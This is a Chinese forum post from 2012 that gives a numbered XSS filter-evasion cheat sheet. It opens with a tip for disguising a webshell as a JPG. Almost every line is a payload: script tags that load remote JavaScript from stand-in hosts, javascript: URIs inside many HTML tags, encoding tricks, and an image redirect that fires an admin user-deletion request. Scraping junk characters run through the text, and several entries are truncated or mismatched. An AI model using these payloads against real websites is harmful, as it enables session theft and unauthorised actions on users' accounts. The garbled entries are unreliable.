跨站图片shell/ j1 d# s9 K D- E
XSS跨站代码 <script>alert("")</script>$ @+ |$ P+ W- N* t& Z
+ T/ h, v+ b! `! {: O" m1 N* g$ s将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马7 E9 N* X$ S F1 ?+ }
4 {# B6 a) F' Y# ^+ E- U6 |
% ]4 s% ], N" t
: y# ~, c+ k0 X4 @1)普通的XSS JavaScript注入
! ?1 q, r! E( q; r% o4 ^. A<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>, _ q t; U" Z' x& U
2 q& y2 W- t p1 S0 |) C
(2)IMG标签XSS使用JavaScript命令. H: `5 M! l5 C" D- e( j! J! h
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>4 y: x) R4 b4 Y2 u' {3 r1 E% a
: v0 n0 ^! {' F1 x(3)IMG标签无分号无引号
( z$ @$ \( O) z/ a4 ~7 q5 E4 ?" A( f<IMG SRC=javascript:alert(‘XSS’)>& d, Q0 B- \8 z
$ D, K) c& i/ {+ I: L: ~
(4)IMG标签大小写不敏感! J7 H: j" w) l
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
' i; k( N! u5 ]! \& B5 \: K- u: ^( F, t. Q: a4 X
(5)HTML编码(必须有分号)+ ]) }0 ~5 ]3 Q+ s. T6 V G* a) X
<IMG SRC=javascript:alert(“XSS”)>
7 Z( p0 I: {; ?8 U; ~* p' \# G4 l& V1 C* O7 a! U1 j
(6)修正缺陷IMG标签
: p# E8 c! u! ~4 g) A6 B<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
9 |' l" S9 `. L. G* U! j
, y4 I; ]) Q7 } u5 y(7)formCharCode标签(计算器)# b G" c4 t( A @4 x
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>0 u6 V' _9 D' h+ v& N4 j1 M) {5 x
- b3 X0 C) j3 a \7 p0 |$ U
(8)UTF-8的Unicode编码(计算器)* m) e% B6 [ S, G
<IMG SRC=jav..省略..S')>' d! o5 f4 t, I1 Y! P
( G! Q. Z( ^6 _7 H: Q(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
" E3 p; C& ^2 I* _2 Z" ?1 Z3 X* ~4 a<IMG SRC=jav..省略..S')>
3 t# k. Y! J. \! y2 O! E) J9 K- g$ b: _ q8 W* U
(10)十六进制编码也是没有分号(计算器)7 \5 j0 F$ A0 N
<IMG SRC=java..省略..XSS')>
\! i1 }8 Z5 J" y2 T4 `% U
v2 w7 F# Q( b4 k(11)嵌入式标签,将Javascript分开* A. ~( H3 C- m8 ~& ~
<IMG SRC=”jav ascript:alert(‘XSS’);”>: \2 k. E, v( X6 y& x2 E& E" n
: U/ ]9 _3 q/ K& o
(12)嵌入式编码标签,将Javascript分开, e" _/ t1 M% g: C! C+ k
<IMG SRC=”jav ascript:alert(‘XSS’);”>
K$ F3 f, W4 W% c& y
* j8 d& x, G3 ^# F(13)嵌入式换行符& }( \( k9 K M, c% p) H# m9 n' G. m
<IMG SRC=”jav ascript:alert(‘XSS’);”>5 \- K' B3 O, }* p& h( y
* m3 A2 R3 Q9 O' d5 u. o1 A
(14)嵌入式回车$ P( y% R. ?- J& V
<IMG SRC=”jav ascript:alert(‘XSS’);”>8 B8 e9 @. I& J6 \
# U/ x; Y; E" K+ I5 U- [
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
' s+ x5 L$ L/ S1 y- i<IMG SRC=”javascript:alert(‘XSS‘)”>
8 C5 a& r: X% G8 _+ b, f# L/ o. y) k8 l4 P, e
(16)解决限制字符(要求同页面)
2 j' y! q: E5 h3 C0 c( C+ S<script>z=’document.’</script>
$ y: U; a5 u2 {9 V/ y9 }' t1 F<script>z=z+’write(“‘</script># a( l) I6 K3 p: \) n8 x2 X
<script>z=z+’<script’</script>
; o6 @3 i, i7 |" G( G# n! H<script>z=z+’ src=ht’</script># K& ?6 B3 s9 A, ]" O" _
<script>z=z+’tp://ww’</script>
/ D2 X Y9 ? H8 b- E/ i<script>z=z+’w.shell’</script>
) i$ G' z- c+ ~; X3 H6 N<script>z=z+’.net/1.’</script>8 M6 w3 d* L F- A/ W
<script>z=z+’js></sc’</script>
# _. F) O) o) ^4 E<script>z=z+’ript>”)’</script>
9 G7 A- G. v- B" g<script>eval_r(z)</script># l3 W6 K) o$ L. B. B" B
4 P4 d4 b7 N: W* Q- N" y
(17)空字符
0 r+ C( F, C! m& u! v8 _perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
$ X& J7 \& s# I* n1 J9 a. c% U p
5 q. V t+ O4 M6 D9 J$ E3 _1 _(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用6 b, D0 z% R) G" j! O
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out7 K2 \2 F; E: H, M7 \0 b5 _4 J
5 j% O# y% T; n* ?* x; Q& W
(19)Spaces和meta前的IMG标签7 ^& `, \* ^$ ?* R6 j: ?
<IMG SRC=” javascript:alert(‘XSS’);”>; A7 a5 y" n ?' B) ?
& R1 v2 Y4 U6 ^# C3 O, w5 \7 B(20)Non-alpha-non-digit XSS
2 h' s4 B7 V1 N* b<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>$ i r I5 z0 S; h4 H
" l3 H& i8 @3 v. ]! R
(21)Non-alpha-non-digit XSS to 2
' b" w) o: j4 }4 l6 {<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>; o7 w: N$ Z& |; }3 C- K
; Q9 R( }. o; x% c(22)Non-alpha-non-digit XSS to 3) G3 s7 V" ^3 g3 @7 K# Y# w
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>: \ [0 W8 ]% L/ P, N, u8 p
f4 ?% i" X! s$ `9 Q(23)双开括号# H0 C) B, ]. Y `0 c% Y
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
9 C+ ^: j; d' I% z3 a: r9 V
5 |3 ~+ ] q2 P% H' O. A(24)无结束脚本标记(仅火狐等浏览器)
+ i ?9 M3 }% _9 ~: |: e; q<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
! C. i& L; x& o5 d$ H
3 @# g8 p/ S P6 t(25)无结束脚本标记2
|0 f5 U# C% z<SCRIPT SRC=//3w.org/XSS/xss.js>' [; x" O% [( w9 I: S* h) q
. [, E' \. g" w5 K(26)半开的HTML/JavaScript XSS; u3 h, @3 t: m. g
<IMG SRC=”javascript:alert(‘XSS’)”% v1 I j6 q9 q, s. b7 J
7 Y! }2 a+ E; Q, [2 j
(27)双开角括号
% z i. \' \& w, @<iframe src=http://3w.org/XSS.html <
2 R" x# S0 t$ Y) Q2 [ f; L- b
2 C5 {8 T5 o. R' n+ R(28)无单引号 双引号 分号
* ~0 }( o/ Z8 B<SCRIPT>a=/XSS/* J$ N) e0 c3 U; N) G
alert(a.source)</SCRIPT>
1 C4 n$ f+ X9 t* ~* V B: C) o
/ F0 P$ M! j5 e" n$ g(29)换码过滤的JavaScript
! S+ Q( j7 E6 Z\”;alert(‘XSS’);//
! z" O1 u4 t, w" n7 }9 [. O
1 u7 I. L1 b3 B; p8 C2 @(30)结束Title标签1 s$ g8 O J8 }. n# J: r2 Q
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>! X) C5 ?) k! c; G+ n! B
3 v/ X9 B$ t5 X3 B' i. R6 |3 ]
(31)Input Image3 l% k; ?* m8 T
<INPUT SRC=”javascript:alert(‘XSS’);”>
6 I8 j# Y. q0 w9 Y
7 o' s0 T9 u7 i) [( Z(32)BODY Image, y! P% V5 G% @7 f9 _7 s' Z
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
2 z6 s9 ]9 g5 X4 x, k; c7 x$ ^: G- p! M( u# w
(33)BODY标签
# D4 _/ a( l7 v9 o9 {% I& b<BODY(‘XSS’)>
& l: Y* x: b6 {' f9 Q
( V4 p. O7 \* i! G) V5 q1 h# L(34)IMG Dynsrc
2 Y1 |' r) q. J6 m3 h" c' |) k<IMG DYNSRC=”javascript:alert(‘XSS’)”>8 j) K! x- w* o8 @3 ~
3 _7 n$ X" r; o9 M, R, a) `# b
(35)IMG Lowsrc
5 B8 o- h: J" X5 j<IMG LOWSRC=”javascript:alert(‘XSS’)”>) l+ f; ^# d+ j' f- \8 v. P+ v( Q# q
5 G7 [& |+ L: B% O% N9 J(36)BGSOUND
' E3 C" `2 e& G/ w6 C3 [<BGSOUND SRC=”javascript:alert(‘XSS’);”>* Q8 S" T: t" M, q. K! a [$ ^
! d& }, n! Z6 N7 m X- D(37)STYLE sheet* t: g. s/ P. a- T+ X3 y+ I, B
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
6 m0 O1 K/ f' j" g z) W! _' B+ |4 m4 u4 q. @/ O N" d, ]& i4 r
(38)远程样式表
) q; G& i+ Q, A l4 M3 e<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
m. e0 n0 O" X0 E$ L! F
' ^5 I+ k- j/ U(39)List-style-image(列表式)1 r0 o3 W2 f* a) S
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
|) E0 ?/ W/ J5 }! ~3 x
4 c# `+ H* }7 A+ J- |(40)IMG VBscript
9 a; `' R/ ^! q, d5 g: L<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS! T( n1 i& Q" y7 R; h7 H7 ~* w
! { P5 _1 _! F* S- g& J4 F
(41)META链接url
0 B% o' x8 l6 z+ i<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>+ w+ s1 P" ~/ c) @; Q* s
% U/ i0 C5 a% [2 O* P
(42)Iframe/ T0 K" O3 w: N, {7 r2 R
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
4 b2 }7 d L, s }: V(43)Frame( r4 C: D q$ i+ V) ^ j" C
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
/ l6 v7 d: [& L- B1 b1 Y% K) d
5 }2 T6 L @+ y(44)Table
) `+ F- I) Y7 x6 s8 b% d' ?* L<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>' ^4 z6 L6 X t$ ]- _4 i6 F
" F& H i- ]$ y U) J, z
(45)TD
) Y$ e' x8 \" ?# d% c' C<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>2 o5 k. N) @9 D4 N c: A
/ i2 J$ c- T* `7 ?* l: {( |7 `(46)DIV background-image
% K6 r4 f+ t, o<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
1 w% r) C0 `9 m: d
+ U' w7 h3 f: G6 c(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)+ t0 Q9 |* c. J) l
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>2 @! @2 y3 s6 F7 l8 ^" i
/ N! n) A- T; E(48)DIV expression
1 H. Y7 s2 C" c' d _" G$ O<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
" U6 a5 E9 B: k$ `1 k: H
% O! Q5 t0 T9 @8 w(49)STYLE属性分拆表达
" l( i+ A* j+ `<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
7 ?1 x$ f/ Y# N0 I0 q6 L& S$ H
' w: L% S/ e. r3 |9 T! p) u(50)匿名STYLE(组成:开角号和一个字母开头)
g8 F' N. z( N6 p6 J! ]$ b<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>- }9 H) r; n- g7 }: n
" [3 z) X! x3 k! }
(51)STYLE background-image- q( n* k3 u! Y7 | E5 L7 I6 b
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>/ f/ d( `8 k" ]) |
! }, \/ x( p+ u: @" ^7 _* _(52)IMG STYLE方式* q1 m, ?* m. ^8 ~6 `% J- l, C- B
exppression(alert(“XSS”))’>
' S' N9 Z" x7 X/ V1 y6 o* h
* I/ p6 K/ L$ w: f7 |, O- N(53)STYLE background
1 b$ K) \# i- {! q/ p8 J<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
7 c+ U- S+ Z+ a0 V! f" Y8 _& G' l) a3 S6 u
(54)BASE: {6 F9 Z. A9 ^% N* u2 {
<BASE HREF=”javascript:alert(‘XSS’);//”>3 A+ f/ x4 Y# d" R& y+ T7 u
) ]# }7 z7 N& b
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS) F0 Q3 o: v. R! a. J
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>' W# F0 }3 z$ {5 { a
% Z" H% Z( k% S- d
(56)在flash中使用ActionScrpt可以混进你XSS的代码
- ^) M {! y% [% J4 J, p7 y* z& u% x% Oa=”get”;
- i3 K6 T- r! N) l, [2 lb=”URL(\”";3 R, E7 K2 A$ F5 m4 z P) w' T
c=”javascript:”;
, L' ~6 x9 K9 f% E5 x5 \d=”alert(‘XSS’);\”)”;
% f! U* @/ n& Y; Keval_r(a+b+c+d);
6 B Q& C: W+ Y$ I- A$ n9 a0 U
5 a% K. \# a: v3 ? a4 v; Q$ Y(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上: v1 K( V' U3 ^( K
<HTML xmlns:xss>9 W* ?$ i4 I5 n* }4 T, g& d- ?2 |- }
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>+ u1 L7 Q( [: D [" d1 ?* `$ T) l6 u
<xss:xss>XSS</xss:xss>* }/ A, q$ ^, Q/ u' |5 c
</HTML>
: ]0 \+ e5 m. u2 ?5 Z, z2 s
- A- d5 a3 _* `( e(58)如果过滤了你的JS你可以在图片里添加JS代码来利用6 x4 M; {, F; n$ _* ~" R4 ~
<SCRIPT SRC=””></SCRIPT>0 U2 g8 D* n) B- w, c" ?/ t
) I& c4 s! o8 f6 n
(59)IMG嵌入式命令,可执行任意命令: Z) J+ e6 H% f
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
' r& D% {/ T4 o' L
$ N0 p( i! X0 L4 G3 {4 X% f(60)IMG嵌入式命令(a.jpg在同服务器)- @7 c5 l" @* A6 n! T
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
% Z- u8 U8 R* f3 z5 L
2 w0 _8 d3 {4 P) h9 a4 a$ N# S(61)绕符号过滤# c: f1 T1 X" j
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
* _9 W' U$ h" s2 G- J; `7 v
9 G( k& z u% _1 {, g o/ J1 V(62)0 K$ f h, u$ o6 Q9 }# Y& p
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>$ J# n. U2 P4 _! G7 ?3 @; ]
7 O9 U8 Q# e3 ~4 ^
(63)
# O7 p3 P) R# ~<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
3 t% j5 N( r8 Z4 `0 p) M* j0 P6 Q1 S( l. N7 i S% d1 S
(64)
" j! q+ B: ?- R<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>+ m$ p! g$ X' |3 p
+ F" A; G v% l/ Z- [/ b8 w8 X4 {
(65)) `+ U% b% _1 p; e
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>+ G( b, R2 S& B+ {& }* k
o/ R5 M) G+ O) y+ c9 f5 P o(66)9 N- s7 Q+ _. Z
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>, ` c1 D: ^/ Z7 m) r
+ t2 b2 ~6 s0 O) q# h8 g(67)
1 E L6 p2 U" r# h/ L/ W<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
2 U* l, x s( ?+ j" d! N- s8 o9 v. t/ u5 T/ ]) {( |
(68)URL绕行# I' y; t5 Z; J2 ]& C; e
<A HREF=”http://127.0.0.1/”>XSS</A>: a. W. U! \ `/ q7 J
$ H O" b; t/ b. b$ K9 o. L(69)URL编码
' {+ V# s/ v9 P1 V, ^8 A9 B<A HREF=”http://3w.org”>XSS</A>" r- ]1 u, Q% a% m9 O; G1 G
% u. u' t- B. u$ f3 e(70)IP十进制' |* ~/ p! V: |
<A HREF=”http://3232235521″>XSS</A>
. J, b; r* D/ U$ w% S0 {. K& L& N" D, C( l4 ~- v+ X
(71)IP十六进制
" r u6 ]3 e4 b" k9 L) ~$ G3 h, t<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>1 h/ m0 P( \, Z" | o' z; T
+ n1 a0 ]5 g+ ^9 u) Z: F3 p
(72)IP八进制
) V. G5 I0 g* }) `8 E& X0 |, T<A HREF=”http://0300.0250.0000.0001″>XSS</A>. D+ z2 ?( U% _4 _0 H
; n4 Z1 W" G. N2 U% z
(73)混合编码& T, c5 i5 q. B! V6 H+ s# K; w; V
<A HREF=”h
- L/ I/ o8 @' i8 A. I# @tt p://6 6.000146.0×7.147/”">XSS</A>( m8 H2 b9 |2 i) s% y- w7 U
7 t& `4 U) V0 u% Z0 K(74)节省[http:]
) ?+ r4 f& H- Y' g) [<A HREF=”//www.google.com/”>XSS</A>& a* ]( l" O: h7 N1 ^ m! ^
1 p; r" a( H% {- c* C
(75)节省[www]' P5 |; A/ A* O& m; T, i
<A HREF=”http://google.com/”>XSS</A>
1 l3 @- ~# y* Y# ~# H
1 N! |# O; Q) Q, y/ ?: p1 U4 r(76)绝对点绝对DNS
6 b4 h! l5 _2 s6 H3 w<A HREF=”http://www.google.com./”>XSS</A>
" G9 Z) W+ \. u1 }0 `; ]$ v2 A7 v1 N1 ?
(77)javascript链接9 d |6 C& I* e" d
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>5 o5 k Y3 e9 u! ]& j
|
发表于 2012-9-13 17:04:56
收藏
支持
反对